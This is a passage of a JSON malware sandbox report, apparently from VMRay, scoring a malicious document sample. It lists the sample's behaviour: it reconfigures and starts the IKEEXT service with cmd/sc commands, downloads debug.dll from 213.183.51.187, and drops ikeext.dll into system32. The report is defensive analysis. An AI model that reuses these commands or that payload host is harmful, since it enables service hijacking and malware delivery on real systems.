"e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr9.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1749", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"C:\\Windows\\system32\\sensr9.dat\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1752", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1812", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\sc.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1833", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1935", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2041", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\attrib.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2128", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\PING.EXE\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "127.0.0.1", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_2136", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"127.0.0.1\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2246", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1037", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"213.183.51.187:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"213.183.51.187/debug.dll\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\tempdebug.dll\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\windows\\system32\\ikeext.dll\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\windows\\system32\\ikeext32.dll\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }